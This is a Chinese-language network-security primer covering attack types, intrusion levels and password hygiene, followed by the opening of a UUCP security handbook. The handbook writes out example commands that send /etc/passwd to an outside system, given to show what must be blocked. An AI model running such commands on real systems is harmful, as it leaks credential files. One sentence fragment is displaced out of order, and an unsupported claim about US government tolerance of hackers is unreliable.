網路安全基礎

[psac]

網路安全基礎
<1>網路的入侵者
<2>攻擊與攻擊信號
<3>攻擊的主要手段
<4>入侵層次分析
<5>關於密碼的安全性
<6>網路安全管理員的素質要求
<7>綜述
--------------------------------------------------------------------------------
網路的入侵者

<1>攻擊與攻擊信號

什麼叫攻擊？攻擊的法律定義是指：攻擊僅僅發生在入侵行為完全完成且入侵者已在目標網路內。但是更積極的觀點是（尤其是對網路安全管理員來說）：可能使一個網路受到破壞的所有行為都應稱為攻擊。即從一個入侵者開始在目標機上工作的那個時刻起，攻擊就開始了。

通常，在正式攻擊之前，攻擊者先進行試探性攻擊，目標是獲取系統有用的信息，此時包括ping掃瞄，連接阜掃瞄，帳戶掃瞄，dns轉換，以及惡性的ip sniffer（通過技術手段非法獲取ip packet，獲得系統的重要信息，來實現對系統的攻擊，後面還會詳細講到），特洛依木馬程序等。這時的被攻擊狀態中的網路經常會表現出一些信號，特徵，例如：

· 日誌中有人企圖利用老的sendmail就是比較明顯的攻擊的信息，即有人在連接阜25上發出了兩三個指令，這些指令無疑是企圖欺騙伺服器將/etc/passwd文件的拷貝以郵件的形式傳送給入侵者，另外show mount指令有可能是有人在收集電腦的信息。

· 大量的掃瞄應立即使root意識到安全攻擊的出現。

· 某主機的一個服務連接阜上出現擁塞現象，此時應該檢查綁定在該連接阜上的服務類型。淹沒式和denial of service 式的攻擊通常是欺騙攻擊的先兆（或是一部分）。

· 等等。

良好周密的日誌記錄以及細緻的分析經常是預測攻擊，定位攻擊，以及遭受攻擊後追查攻擊者的有力武器。察覺到網路處於被攻擊狀態後，網路安全管理員應該立刻按照操作規程進行記錄，向主管領導匯報，相應的安全措施等處理。

攻擊的主要手段

對電腦網路進行攻擊的手段可以分為幾個主要種類，它們的危害程度和檢測防禦辦法也各不相同：

1 收集信息攻擊：

經常使用的工具包括：NSS, Strobe，Netscan， SATAN（Security Aadministrator's Tool for Auditing Network),Jakal, IdentTCPscan, FTPScan等以及各種sniffer.廣義上說，特洛依木馬程序也是收集信息攻擊的重要手段。收集信息攻擊有時是其它攻擊手段的前奏。對於簡單的連接阜掃瞄，敏銳的安全管理員往往可以從異常的日誌記錄中發現攻擊者的企圖。但是對於隱秘的sniffer和trojan程序來說，檢測就是件更進階和困難的任務了。

1.1 sniffer

它們可以截獲密碼等非常秘密的或專用的信息，甚至還可以用來攻擊相鄰的網路，因此，網路中sniffer的存在，會帶來很大的威脅。這裡不包括安全管理員安裝用來監視入侵者的sniffer，它們本來是設計用來診斷網路的連接情況的.它可以是帶有很強debug功能的普通的網路分析器，也可以是軟體和硬體的聯合形式。現在已有工作於各種平台上的sniffer，例如:

· Gobbler(MS-DOS)

· ETHLOAD(MS-DOS)

· Netman(Unix)

· Esniff.c(SunOS)

· Sunsniff(SunOS)

· Linux-sniffer.c(Linux)

· NitWit.c(SunOS)

· etc.

檢測sniffer的存在是個非常困難的任務，因為sniffer本身完全只是被動地接收資料，而不傳送什麼。並且上面所列的sniffer程序都可以在internet上下載到，其中有一些是以源碼形式發佈的(帶有.c副檔名的)。

一般來講，真正需要保密的只是一些關鍵資料，例如用戶名和密碼等。使用ip包一級的加密技術，可以使sniffer即使得到資料包，也很難得到真正的資料本身。這樣的工具包括 secure shell（ssh），以及F-SSH， 尤其是後者針對一般利用tcp/ip進行通信的公共傳輸提供了非常強有力的，多級別的加密算法。ssh有免費版本和商業版本，可以工作在unix上，也可以工作在windows 3.1, windows 95, 和windows nt.

另外,採用網路分段技術,減少信任關係等手段可以將sniffer的危害控制在較小範圍以內,也為發現sniffer的主人提供了方便.

1.2 Trojan

這是一種技術性攻擊方式. RFC1244中給出了trojan程序的傳統定義：特洛依木馬程序是這樣一種程序，它提供了一些有用的，或僅僅是有意思的功能。但是通常要做一些用戶不希望的事，諸如在你不瞭解的情況下拷貝文件或竊取你的密碼, 或直接將重要資料轉送出去，或破壞系統等等. 特洛依程序帶來一種很進階別的危險，因為它們很難被發現，在許多情況下，特洛依程序是在二進制程式碼中發現的，它們大多數無法直接閱讀，並且特洛依程序可以作用在許許多多系統上,它的散播和病毒的散播非常相似。從internet上下載的軟體,尤其是免費軟體和共享軟體,從匿名伺服器或者usernet新聞組中獲得的程序等等都是十分可疑的. 所以作為關鍵網路中的用戶有義務明白自己的責任,自覺作到不輕易安裝使用來路不清楚的軟體.

檢測一個特洛依程序，需要一些比較深入的有關操作系統的知識。可以通過檢查文件的更改時間，文件長度，校驗和等來檢查文件是否進行過非預期的操作。另外，文件加密也是有效的檢查特洛依程序的方法。可以使用的工具包括:

· trip wire 是一個廣泛套用的系統完整性工具.系統通過讀取配置文件得到環境變量.在這個文件中包含著所有的文件標誌(filemarks),使用者可以詳盡地規定應該對哪些文件作出哪些改變作出報告等.它們的數字簽名儲存在資料庫中.數字簽名可以使用的hash函數包括: MD5, MD4, CRC32, MD2, Snc frn, SHA等.

· TAMU程序包可以檢查許多項目,包括由CERT通知中定義的項目,以及最近的入侵事件中發現的項目,所有被改動的系統二進制流,以及要求保密的那些關鍵路徑.

· Hobgoblin

· ATP(The Anti-Tampering Program)

後面兩種工具的使用沒有前面兩種那麼普遍,但是它們都各有特點.

2 denial of service：

這是一類個人或多個人利用internet傳輸協定組的某些方面妨礙甚至關閉其它用戶對系統和信息的合法訪問的攻擊. 其特點是以潮水般的連接申請使系統在應接不暇的狀態中崩潰。對於大型網路而言,此類攻擊只是有限的影響, 但是卻可能導致較小網路退出服務, 遭到重創.

這是最不容易捕獲的一種攻擊，因為不留任何痕跡，安全管理人員不易確定攻擊來源。由於這種攻擊可以使整個系統癱瘓，並且容易實施，所以非常危險。但是從防守的角度來講，這種攻擊的防守也比較容易. 攻擊者通過此類攻擊不會破壞系統資料或獲得未授權的權限, 只是搗亂和令人心煩而已. 例如使網路中某個用戶的郵箱超出容限而不能正常使用等.

典型的攻擊包括如E-mail炸彈, 郵件列表連接,

2.1 Email炸彈

它是一種簡單有效的侵擾工具. 它反覆傳給目標接收者相同的信息, 用這些垃圾擁塞目標的個人郵箱. 可以使用的工具非常多, 例如bomb02.zip(mail bomber), 執行在windows平台上,使用非常簡單. unix平台上發起email bomb攻擊更為簡單, 只需簡單幾行shell程序即可讓目標郵箱內充滿垃圾.

它的防禦也比較簡單. 一般郵件收發程序都提供過濾功能, 發現此類攻擊後, 將源目標位址放入拒絕接收列表中即可.

2.2 郵件列表連接

它產生的效果同郵件炸彈基本相同. 將目標位址同時註冊到幾十個(甚至成百上千)個郵件列表中, 由於一般每個郵件列表每天會產生許多郵件, 可以想像總體效果是什麼樣子. 可以手工完成攻擊, 也可以通過建立郵件列表資料庫而自動產生. 對於郵件列表連接,尚沒有快速的解決辦法. 受害者需要把包含註銷"unsubscribe"信息的郵件發往每個列表.

許多程序能夠同時完成兩種攻擊, 包括Up yours(Windows), KaBoom(Windows), Avalanche(Windows), Unabomber(Windows), eXtreme Mail(Windows), Homicide(Windows), Bombtrack(Macintosh), FlameThrower(Macintosh), etc.

2.3 其它

還有一些針對其它服務的攻擊, 例如Syn-Flooder, Ping of Death(傳送異常的很大的進行ping操作的packet來攻擊windows nt), DNSkiller(執行在linux平台上, 攻擊windows nt平台上的dns伺服器)等。

在路由的層次上,對資料流進行過濾, 通過合適的配置會減少遭受此類攻擊的可能性.Cisco Systems就提供了路由級的解決方案
3 spoofing attack(電子欺騙)：

針對http，ftp，dns等傳輸協定的攻擊，可以竊取普通用戶甚至超級用戶的權限，任意修改信息內容，造成巨大危害。所謂ip欺騙，就是偽造他人的源ip位址。其實質上就是讓一台機器來扮演另一台機器，藉以達到矇混過關的目的。下面一些服務相對來說容易招致此類攻擊：

· 任何使用sunrpc使用的配置；rpc指sun公司的遠端程序使用標準，是一組工作於網路之上的處理系統使用的方法。

· 任何利用ip位址認證的網路服務

· mit的xwindow系統

· 各種r服務: 在unix環境中，r服務包括rlogin和rsh，其中r表示遠端。人們設計這兩個應用程式的初衷是向用戶提供遠端訪問internet網路上主機的服務。r服務極易受到ip欺騙的攻擊。

幾乎所有的電子欺騙都倚賴於目標網路的信任關係（電腦之間的互相信任，在unix系統中，可以通過設定rhosts和host.equiv 來設定）。入侵者可以使用掃瞄程序來判斷遠端機器之間的信任關係。這種技術欺騙成功的案例較少，要求入侵者具備特殊的工具和技術（，並且現在看來對非unix系統不起作用）。另外spoofing的形式還有dns spoofing等。

解決的途徑是慎重設定處理網路中的主機信任關係，尤其是不同網路之間主機的信任關係。如只存在區域網路內的信任關係，可以設定路由器使之過濾掉外部網路中自稱源位址為內部網路位址的ip包，來抵禦ip欺騙。下面一些公司的產品提供了這種功能

· Cisco System

· iss.net公司的安全軟體包可以測試網路在ip欺騙上的漏洞。

· etc.

國際黑客已經進入有組織有計劃地進行網路攻擊階段，美國政府有意容忍黑客組織的活動，目的是使黑客的攻擊置於一定的控制之下，並且通過這一渠道獲得防範攻擊的實戰經驗。國際黑客組織已經發展出不少逃避檢測的技巧. 使得攻擊與安全檢測防禦的任務更加艱巨.

入侵層次分析

1 敏感層的劃分

使用敏感層的概念來劃分標誌攻擊技術所引起的危險程度.

1 郵件炸彈攻擊（emailbomb）（layer1）

2 簡單服務拒絕攻擊（denial of service）（layer1+）

3 本機用戶獲得非授權讀訪問（layer2）

4 本機用戶獲得他們非授權的文件寫權限（layer3）

5 遠端用戶獲得非授權的帳號（layer3+）

6 遠端用戶獲得了特權文件的讀權限（layer4）

7 遠端用戶獲得了特權文件的寫權限（layer5）

8 遠端用戶擁有了根（root）權限（黑客已攻克系統）（layer6）

以上層次劃分在所有的網路中幾乎都一樣，基本上可以作為網路安全工作的考核指標。

"本機用戶"（local user）是一種相對概念。它是指任何能自由登入到網路上的任何一台主機上，並且在網路上的某台主機上擁有一個帳戶，在硬碟上擁有一個目錄的任何一個用戶。在一定意義上，對內部人員的防範技術難度更大。據統計，對信息系統的攻擊主要來自內部，占85％。因為他們對網路有更清楚的瞭解，有更多的時間和機會來測試網路安全漏洞，並且容易逃避系統日誌的監視。

2 不同的對策

根據遭受的攻擊的不同層次，應採取不同的對策.

第一層：

處於第一層的攻擊基本上應互不相干,第一層的攻擊包括服務拒絕攻擊和郵件炸彈攻擊.郵件炸彈的攻擊還包括登記列表攻擊（同時將被攻擊目標登入到數千或更多的郵件列表中，這樣，目標有可能被巨大數量的郵件列表寄出的郵件淹沒）。對付此類攻擊的最好的方法是對源位址進行分析，把攻擊者使用的主機(網路)信息加入inetd.sec的拒絕列表(denylistings)中.除了使攻擊者網路中所有的主機都不能對自己的網路進行訪問外,沒有其它有效的方法可以防止這種攻擊的出現.

此類型的攻擊只會帶來相對小的危害。使人頭疼的是雖然這類攻擊的危害性不大，但是發生的頻率卻可能很高，因為僅具備有限的經驗和專業知識就能進行此類型的攻擊。

第二層和第三層：

這兩層的攻擊的嚴重程度取決於那些文件的讀或寫權限被非法獲得。對於isp來說，最安全的辦法是將所有的shell帳戶都集中到某一台（或幾台）主機上，只有它們才能接受登入，這樣可以使得管理日誌，控制訪問，傳輸協定配置和相關的安全措施實施變得更加簡單。另外，還應該把存貯用戶編寫的cgi程序的機器和系統中的其它機器相隔離。

招致攻擊的原因有可能是部分配置錯誤或者是在軟體內固有的漏洞.對於前者，管理員應該注意經常使用安全工具搜尋一般的配置錯誤，例如satan。後者的解決需要安全管理員花費大量的時間去跟蹤瞭解最新的軟體安全漏洞報告，下載修正檔或聯繫供貨商。實際上，研究安全是一個永不終結的學習程序。安全管理員可以訂閱一些安全郵件列表，並學會使用一些指令碼程序（如perl，等）自動搜尋處理郵件，找到自己需要的最新信息。

發現發起攻擊的用戶後，應該立即停止其訪問權限，凍結其帳號。

第四層:

該層攻擊涉及到遠端用戶如何獲取訪問內部文件的權利。其起因大多是伺服器的配置不當，cgi程序的漏洞和溢出問題。

第五層和第六層:

只有利用那些不該出現卻出現的漏洞，才可能出現這種致命的攻擊。

出現第三,四,五層的攻擊表明網路已經處於不安全狀態之中，安全管理員應該立即採取有效措施, 保護重要資料, 進行日誌記錄和匯報,同時爭取能夠定位攻擊發起地點：

· 將遭受攻擊的網段分離出來，將此攻擊範圍限制在小的範圍內

· 記錄當前時間,制作備份系統日誌,檢查記錄損失範圍和程度

· 分析是否需要中斷網路連接

· 讓攻擊行為繼續進行

· 如果可能，對系統做0級制作備份

· 將入侵的詳細情況逐級向主管領導和有關主管部門匯報；如果系統受到嚴重破壞，影響網路業務功能，立即使用備件恢復系統

· 對此攻擊行為進行大量的日誌工作

· (在另一個網段上）竭盡全力地判斷尋找攻擊源

總之，不到萬不得已的情況下, 不可使系統退出服務. 尋找入侵者的最重要的工作就是做日誌記錄和定位入侵者，而找出入侵者並通過法律手段迫使其停止攻擊是最有關於密碼安全性

通過密碼進行身份認證是目前實現電腦安全的主要手段之一，一個用戶的密碼被非法用戶獲悉，則該非法用戶即獲得了該用戶的全部權限，這樣，尤其是高權限用戶的密碼洩露以後，主機和網路也就隨即失去了安全性。黑客攻擊目標時也常常把破譯普通用戶的密碼作為攻擊的開始。然後就採用字典窮舉法進行攻擊。它的原理是這樣的：網路上的用戶常採用一個英語單詞或自己的姓名、生日作為密碼。通過一些程序，自動地從電腦字典中取出一個單詞，作為用戶的密碼輸入給遠端的主機，申請進入系統。若密碼錯誤，就按序取出下一個單詞，進行下一個嘗試。並一直循環下去，直到找到正確的密碼，或字典的單詞試完為止。由於這個破譯程序由電腦程序來自動完成，幾個小時就可以把字典的所有單詞都試一遍。這樣的測試容易在主機日誌上留下明顯攻擊特徵，因此，更多的時候攻擊者會利用其它手段去獲得主機系統上的/etc/passwd文件甚至/etc/shadow文件，然後在本機對其進行字典攻擊或暴力破解。攻擊者並不需要所有人的密碼，他們得到幾個用戶密碼就能獲取系統的控制權，所以即使普通用戶取密碼過於簡單可能會對系統安全造成很大的威脅。系統管理員以及其它所有用戶對密碼選取的應採取負責的態度，消除僥倖和偷懶思想。

然而，有許多用戶對自己的密碼沒有很好的安全意識，使用很容易被猜出的密碼，如：帳號本身，第一個字母大寫，或者全部大寫，或者後面簡單加上一個數字，甚至只是簡單的數字，如0，1，123，888，6666，168等，有些是系統或者主機的名字，或者常見名詞如system，manager，admin等。其實，根據目前電腦加密解密處理的算法和能力，防止自己密碼被使用字典攻擊法猜出的辦法也很簡單,使自己的密碼不在相應解密程序的字典中。一個好的密碼應當至少有7個字串長,不要用個人信息(如生日,名字等),密碼中要有一些非字母(如數字,標點符號,控制字串等),還要好記一些,不能寫在紙上或電腦中的文件中,選項密碼的一個好方法是將兩個不相關的詞（最好再組合上大小寫）用一個數字或控制字串相連,並截斷為8個字串。例如me2.Hk97就是一個從安全形度講很不錯的密碼。

保持密碼安全的一些要點如下:

· 密碼長度不要小於6位，並應同時包含字母和數字，以及標點符號和控制字串

· 密碼中不要使用常用單詞（避免字典攻擊），英文簡稱，個人信息（如生日,名字,反向拼寫的登入名,房間中可見的東西），年份，以及機器中的指令等

· 不要將密碼寫下來。

· 不要將密碼存於電腦文件中。

· 不要讓別人知道。

· 不要在不同系統上，特別是不同級別的用戶上使用同一密碼。

· 為防止眼明手快的人竊取密碼,在輸入密碼時應驗證無人在身邊。

· 定期改變密碼,至少6個月要改變一次。

· 系統安裝對密碼文件進行隱藏的程序或設定。（e.g. Shadow Suite for linux)

· 系統配置對用戶密碼設定情況進行檢測的程序，並強制用戶定期改變密碼。任何一個用戶密碼的脆弱，都會影響整個系統的安全性。(e.g. passwd+, Crack,etc)

最後這點是十分重要的,永遠不要對自己的密碼過於自信,也許就在無意當中洩露了密碼。定期地改變密碼,會使自己遭受黑客攻擊的風險降到了一定限度之內。一旦發現自己的密碼不能進入電腦系統,應立即向系統管理員報告,由管理員來檢查原因。

系統管理員也應定期執行這些破譯密碼的工具,來嘗試破譯shadow文件,若有用戶的密碼密碼被破譯出,說明這些用戶的密碼取得過於簡單或有規律可循,應儘快地通知他們,及時更正密碼,以防止黑客的入侵。

網路安全管理員的素質要求

· 深入地瞭解過至少兩個操作系統，其中之一無可置疑地是unix。熟練配置主機的安全性選項和設定，及時瞭解已見報道的安全漏洞，並能夠及時下載相應修正檔安裝。在特殊緊急情況下，可以獨立開發適合的安全工具或修正檔，提高系統的安全性。

· 對tcp/ip傳輸協定族有透徹的瞭解，這是任何一個合格的安全管理員的必備的素質。並且這種知識要不僅僅停留在internet基本構造等基礎知識上，必須能夠根據偵測到的網路信息資料進行準確的分析，達到安全預警，有效制止攻擊和發現攻擊者等防禦目的。

· 熟練使用c，c++，perl等語言進行編程。這是基本要求，因為許多基本的安全工具是用這些語言的某一種編寫的。安全管理員至少能正確地解釋，編譯和執行這些程序。更高的要求是能夠把不專門為某個特定平台開發的工具移植到自己的平台上。同時他們還能夠開發出可擴展自己系統網路安全性的工具來，如對satan和safe suite的擴展和昇級（它們允許用戶開發的工具附加到自己上）

· 經常地保持與internet社會的有效接觸。不僅要瞭解自己的機器和區域網路，還必須瞭解熟悉internet。經驗是不可替代的。

· 熟練使用英語讀寫，與internet網上的各個安全論壇建立經常的聯繫。

· 平時注意收集網路的各種信息, 包括硬體應識別其構造,製造商,工作模式,以及每台工作站,路由器,集線器,網路卡的型號等;軟體網路軟體的所有類型以及它們的版本號;傳輸協定網路正在使用的傳輸協定; 網路規劃例如工作站的數量,網段的劃分,網路的擴展; 以及其它信息例如網路內部以前一直實施中的安全原則的概述,曾遭受過的安全攻擊的歷史記錄等.

綜述

現在，有關電腦網路安全，侵入等事件的報道和社會的關註明顯增加。一方面，電腦普及率近年來大幅度提高，其中聯入英特網的電腦數量也迅速增加，為電腦入侵等違法犯罪行為提供了群眾基礎和物質條件，另一方面，應該說，社會對於電腦安全的重要性和嚴肅性認識不夠。從入侵的動機來看，包括對原顧主服務機構的怨恨，對網路安全技術的挑戰，網路接入帳號，信用卡號等金錢利益，或者單純的想利用攻擊網路站點而出名，以及對網路的好奇心（這方面主要是孩子們的行為），以及政治目的等等，當然其它一些原因也都可能引起攻擊者的蓄意攻擊行為。但是從已見報道的電腦犯罪案件來看，大多數電腦網路犯罪者都表示原來不知道這樣做是犯罪。多數系統管理人員和工程施工人員在安全問題上的意識淡漠，建設中或建設後在沒有採取足夠的安全防護措施的情況下，將主機連線到internet上，也為電腦犯罪開啟了方便之門，使得一些青少年利用從網路上學來的簡單入侵手段就能在網路上通行無阻，在滿足自己好奇心的同時，觸犯了國家法律。為此，加強電腦安全教育，包括提高各級網路管理人員對網路重要性的認識和安全措施的掌握水準，向社會宣傳電腦網路入侵的嚴肅性，尤其是加強擁有internet訪問能力的青少年的網路安全法律觀念。

具體措施可以包括以公益廣告的形式向社會宣傳電腦網路安全的嚴肅性和法律含義，在各地電信部門和政府部門的主頁上以醒目的方式告戒有入侵傾向的網路用戶；各種isp在註冊用戶的時候，與用戶簽定安全協定，不滿18週歲的青少年應該有監護人保證才能訪問網路；網路管理員在發現有不明身份的用戶時，應確定其身份，並對其發出警告，提前制止可能的網路犯罪；主要isp和網路經營服務機構應該有專門的網路安全管理人員對網路進行定期的安全檢查，網路中配置相當的安全檢測工具；等等。

從電信運營商和英特網絡接入服務提供商的角度來講，切實地加強網路的安全配置和管理，作到防患於未然，可以有效地減少電腦網路犯罪的頻率和損失，同時安全方面的提高，也會增加用戶對網路的信息，有利於電子商務等業務的推出和開展，增加業務收入。

本文主要總結了unix系統平台的安全問題，有些方面與其它操作系統（windows nt等）相通。這並不意味著其它系統平台或設備就沒有安全問題或較少安全問題，只是因為目前情況下，關鍵任務套用執行的平台以unix為主。但是隨著windows nt系統高端套用裝機數量的增加，nt平台的安全問題也越來越重要。據報道，Cisco公司日前向他們的客戶們驗證了他們的網際網路絡操作系統IOS軟體存在漏洞，該漏洞將破壞Cisco公司的多數路由器產品的安全系統。 根據該公司的說法，一個未經授權的入侵將導致執行IOS軟體的Cisco網路設備崩潰，而且在重啟後可以不通過路由器直接登入。為了修補這個BUG，Cisco公司估計客戶得對2-3個聯在網際網路絡上的路由器上的軟體進行昇級。Cisco可為客戶提供免費昇級軟體。目前 Cisco 已將該漏洞的 修正檔程序放在其公司網站上供用戶下載。但據說這個修正檔程序對IOS 10.3或更低的版本不起作用。據稱此次發現的漏洞已經存在了很長的一段時間，一直沒有被發現。Cisco希望用戶不要對此過於擔心。以此說明，專門提供安全功能的產品本身依然有安全漏洞，安全問題事實上已成為非常普遍存在的隱患，需要投入更充足的人力，資源來重視解決。
效的防衛手段。

[psac]

網路安全手冊

網路安全手冊(一)
本文主要討論網路和資料通訊安全,分為六個部分.第一部分概述最大,最老
的UNIX網路UUCP系統;第二部分討論UUCP的安全;第三部分討論新HONEY DANBERUUCP及安全特
點;第四部分討論其它的UNIX網路,其中包括RJE和NSC;第五部分討論通訊的物理安全;最後一
部分討論Sun Microsystem公司的Sun OS系統的網路安全.

1.UUCP系統概述
UUCP系統是一組程序,完成文件傳輸,執行系統之間的指令,維護系統使用情況的統計,保護安
全.UUCP是UNIX系統最廣泛使用的網路實用系統,這其中在兩個原因:第一,UUCP是各種UNIX版
本都可用的唯一的標準網路系統,第二,UUCP是最便宜的網路系統.只需要一根電纜連接兩個系
統,然後就可建立UUCP.如果需要在相距數百或數千公里遠的兩個系統間傳輸資料,中需要兩個
具有撥號功能的調製解調器.

(1)UUCP指令
UUCP指令之一是uucp,該指令用於兩系統間的文件傳輸,uucp指令格式類似於cp指令的格式,
只是uucp允許用戶有系統間拷貝文件,指令的一般格式如
下:
uucp source_file destination_file
source_file通常是本系統的文件(但不必一定是),destination_file通常是另一系統的文件
或目錄.指定destination_file的格式為:
system!filename或system!directory.
uucp給系統管理員提供了一個選項,可以限制傳入和傳出本系統的uucp文件只能傳到/usr/s
pool/uucppublic目錄結構中.若告訴uucp將傳輸的文件存放在其他目錄中,系統將會送回一個
郵件:remote access to path / file denied. uucp允許以簡化符號~替代/usr/spool/uucp
public/.如:
uucp names remote!~/john/names
有時也可用uucp將文件從另一個系統拷貝到本系統,只要將要傳入本系統的文件指定為源文
件(用system!file)即可,如:
uucp remotes!/usr/john/file1 file1
如果在遠地機限制了文件傳輸的目錄,上條指令不能拷貝到文件.拷貝文件到本系統的最安全
的方法是:在兩個系統上都通過uucppublic目錄進行文件傳輸:
uucp remotes!~/john/file1 ~/pat/file1

(2)uux指令
uux指令可用於在另一個系統上執行指令,這一特點稱為"遠端指令仞行".
uux最通常的用處是在系統之間傳送郵件(mail在其內部執行uux).典型的uux請求如下:
pr listing| uux - "remote1!lp -d pr1"
這條指令將文件listing格式編排後,再連線到系統remote1的列印機pr1
上列印出來.uux的選項"-"使uux將本指令的標準輸入設備建立為遠端指令的標準輸入設備.
當若干個系統中只有一個系統連接了列印機時,常用uux列印文件.
當然必須嚴格地限制遠端指令招待,以保護系統安全.如:
本系統不應允許其它系統上的用戶執行下面的指令:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
這條指令將使本系統傳送/etc/passwd文件到系統outside上,一般地,只有幾條指令允許地執
行.rmail是加限制的mail程序,常常為允許通過uux執行的指令之一.也允許rnews(加限制的n
etnews偽離線指令)在執行netnews的系統上執行,還允許lp在提供了列印設備的系統上執行.

3)uucico程序uucp和uux指令實際上並不使用另一個系統及傳送文件和執行指令,而是將用戶
的請求排入貯列,並啟動uucico程序.uucico完成實際的通訊工作.它使用其它的系統,登入,傳
送資料(可以是文件或請求遠端指令執行).如果電話線忙,或其它系統已關機,傳輸請求仍針保
留在貯列中,uucico後續的職能操作(通常是cron完成)將傳送這些傳輸請求.
uucico完成資料的傳送和接收.在本系統的/etc/passwd文件中,有其它系統的uucico登入進
入本系統的入口項,該入口項中指定的預設shell是uucico.
因此,其它系統使用本系統時,直接與uucico對話.

(4)uuxqt程序
當另一系統的uucico使用本系統請求遠端指令執行時,本系統的uucico將該請求排入貯列,並
在退出之前,啟動uuxqt程序執行遠端指令請求.
下面舉例說明資料是如何傳輸的.假設本系統的一個用戶傳送郵件給另一遠端系統remote1的
某人,mail會執行uux,在remote1系統上遠端地執行remail程序,要傳送的郵件為remail指令的
輸入.uux將傳輸請求排入貯列,然後啟動
uucico招待實際的遠端使用和資料傳輸.如果remote1回應請求,uucico登入到 remote1,然後
傳送兩個文件:郵件和將在remote1上由uuxqt執行的uux指令文
件.uux指令文件中含有執行remail請求.如果remote1在被調時已關機,uucico 則將無法登和
傳送文件,但是cron會週期地(1小時)啟動uucico.uucico搜尋是 否有還未傳送出的資料,若發
現uux指定的傳輸目標系統是remote1,就嘗試再 使用remote1,直到調通remote1為止,或者過
了一定天數仍未調通remote1,未 送出的郵件將作為"不可投遞"的郵件退回給傳送該郵件的用
戶.
2.UUCP的安全問題
UUCP系統未設定限制,允許任何本系統外的用戶執行任何指令和拷貝進/出uucp用戶可讀/寫
的任何文件.在具體的uucp套用環境中應瞭解這點,根據需要設定保護.
在UUCP中,有兩個程序處理安全問題.第一個是uucico程序,該程序在其它系統使用本系統時
啟動.這個程序是本系統uucp安全的關鍵,完成本系統檔案傳輸的傳進和傳出.第二個程序是u
uxqt,該程序為所有的遠端指令執行服務.

(1)USERFILE文件
uucico用文件/usr/lib/uucp/USERFILE確定遠端系統傳送或接收什麼文件,其格式為:
login,sys[c] path_name [path_name...]
其中login是本系統的登入名,sys是遠端系統名,c是可選的call_back標誌,path_name是目錄
名.
uucico作為登入shell啟動時,將得到遠端系統名和所在系統的登入名,並在USERFILE文件中
找到匹配login和sys的行.如果該行含有call_back標誌c,uucico將不傳送文件,連接中斷連線,調
用遠端系統(即,任何系統可以告訴本系統它的名是xyz,於是本系統掛起,使用實際的xyz執行
文件傳輸),若無c,uucico將執行遠端系統請求的文件傳送,被傳送的檔案名被假定為以path_
name開頭的.
用戶需要瞭解以下幾點:
. 如果遠端系統使用的登入名未列於USERFILE的登入域中,uucico將拒絕允許其它系統做任
何事,並掛起.
. 如果系統名未列於sys域中,uucico將使用USERFILE中有匹配的登入名 和空系統名的第一
行,如:nuucp,/usr/spool/uucppublic套用到作為 nuucp登入的所有系統.cbuucp,c將迫使作
為cbuucp登入的所有系統自 己執行文件傳輸的請求.若使用系統名不匹配sys系統中的任何一
個,並 且無空入口項,uucico也將拒絕做任何事.
. 若兩個機器都設定了call_back標誌,傳送文件的請求決不會被執行,兩 個系統一直互相調
用,直到兩個系統中的一個取消call_back時,才能進 行文件傳送.
. 如果一個用戶的登入名列於USERFILE文件的login域中,則當使用本系 統的uucico為該用
戶傳送文件時,uucico只傳送至path_name指定的目 錄中的文件.空登入名用於所有未明確列
於USERFILE文件中的用戶進行 登入.所以
pat,/usr/pat
只允許pat傳送/usr/pat目錄結構中的文件.
,/usr/spool/uucppublic /tmp
其他用戶僅允許傳送目錄/usr/spool/uucppublic和/tmp中的文件.
不要允許uucico將文件拷進/出到除了/usr/spool/uucppublic目錄以 外的其它任何目錄,否
則可能會有人用下面的指令拷貝走本系統的重要 信息:
uucp yoursys!/etc/passwd to-creep
(2)L.cmds文件
uuxqt利用/usr/lib/uucp/L.cmds文件確定要執行的遠端執行請求指令.
該檔案的格式是每行一條指令.如果只需uuxqt處理電子郵件,該檔案中就只須 一行指令:
rmail
系統管理員可允許登入用戶執行netnews(rnews)的指令或遠端列印指令
(lp),但決不能允許用戶執行拷貝文件到標準輸出的指令,如cat指令或網路命 令uucp,否則
這些人只需在他們自己的系統上敲入:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
然後就可等待本系統傳送出指令文件.

(3)uucp登入
UUCP系統需要兩個登入戶頭,一個是其它系統登入的戶頭,另一個是系統 管理使用的戶頭.例
如,資料傳輸登入戶頭是nuucp,管理登入戶頭是uucp,則在
/etc/passwd文件中應當有二行.
UID和GID的5號通常留給uucp,由於uucico具有管理登入的SUID許可,因此 nuucp戶頭的UID和
GID應當用其它值.

(4)uucp使用的文件和目錄
/usr/lib/uucp用於存放不能由用戶直接執行的各種uucp,如uuxqt和 uucico.該目錄還含有
若干個確定uucp如何操作的文件,如L.cmds和USERFILE. 這些文件只能對uucp管理戶頭可寫(
系統管理員一定不願讓用戶更改遠端可執 行指令表):根據安全的觀點,該目錄中另一個系統
管理員必須清楚的文件是 L.sys.該檔案中含有uucico能使用的每個系統的入口項.入口項數
據包括uucico所使用系統的電話號碼,登入名,未加密的密碼.不用說,L.sys應當屬於 uucp管
理戶頭所有,且應當具有400或600存取許可.
uucp用/usr/spool/uucp目錄存放工作文件.檔案名以C.開頭的文件是送 到其它系統的指令
文件,含有在其它系統上拷入/出資料和執行指令的請求.文 件名以D.開頭的文件用作C.文件
的資料文件.檔案名以X.開頭的文件是來自其 它系統的遠端執行請求,由uuxqt解釋.檔案名以
TM.開始的文件是從其它系統 傳送資料到本系統程序中uucp所使用的暫存文件.XQTDIR是uux
qt用於執行X.
文件的目錄.LOGFILE可有助於管理uucp的安全,它含有執行uucp請求成功與否 的信息.系統
管理員可時常檢視該檔案,瞭解有哪些系統正登入入本系統執行 uucp請求?是什麼請求?特別
要檢查這些請求是否試突做不允許的操作.
網路安全手冊<二>
3.HONEYDANBER UUCP
有兩個主要的UUCP版本,第一個是與UNIX系統V一起頒布的,在本節將稱為老UUCP,另一個版本
稱為HONEYDANBER UUCP,由AT&T頒布.
HONEYDANBER UUCP較之老UUCP有若干改進:
<1>支持更多的撥號和網路:
. 智能自動撥號調製解調器以及標準AT&T技術的801自動撥號器.
. 網路,如DATAKIT VCS,UNET/ETHERNET, 3COM/ETHERNET, SYTEK, TCP
(BSD UNIX系統).
. 連線到LAN的撥號器.
. X.25永久性虛擬環網(用X.25傳輸協定)
<2>重新組織了/usr/spool/uucp目錄,在該目錄下,對每個遠端系統有一個
目錄.
<3>加強了安全.
. USERFILE和L.cmds文件組合成一個文件Permissions.
. 可以在一級級系統上指定遠端可執行指令.
. 可分別控制文件傳入和文件傳出.
. 預設的安全性設定很嚴格.

